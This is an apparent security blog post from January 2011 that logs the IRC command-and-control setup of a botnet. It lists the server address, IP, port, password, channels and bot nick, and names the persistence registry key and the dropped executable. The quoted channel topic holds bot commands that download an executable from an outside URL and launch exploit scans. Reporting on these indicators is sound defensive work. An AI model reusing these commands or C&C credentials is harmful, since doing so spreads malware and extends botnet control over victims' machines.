Botnet IRC C&C
Found 1 addresses
addr: aaaa.forexinvest4.com ip: 216.104.45.90
aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Thursday, January 13, 2011
aaaa.forexinvest4.com (Updated)
Posted by Role at 1:00 AM
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment